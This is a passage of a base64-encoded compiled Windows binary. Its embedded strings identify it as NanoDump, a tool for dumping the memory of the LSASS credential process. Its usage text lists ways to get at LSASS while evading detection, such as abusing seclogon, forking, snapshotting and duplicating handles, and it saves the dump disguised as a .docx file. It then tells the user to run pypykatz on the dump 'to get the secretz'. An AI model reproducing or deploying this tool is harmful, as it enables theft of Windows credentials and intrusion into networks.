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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAAAAAAAAAAAAAA+ABAAQAAAAAAAAAAAAAA//////////8AAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAAQAAAAMO////APwAAAQAAAAAAAAAOAAAAAAAAAAAAAAAgcQFAAQAAAAAAAAAAAAAAYO8AQAEAAAAAAAAAAAAAAHDvAEABAAAAAAAAAAAAAACA7wBAAQAAAAAAAAAAAAAAAPAAQAEAAACQ7wBAAQAAAGDwAEABAAAAcPAAQAEAAACA8ABAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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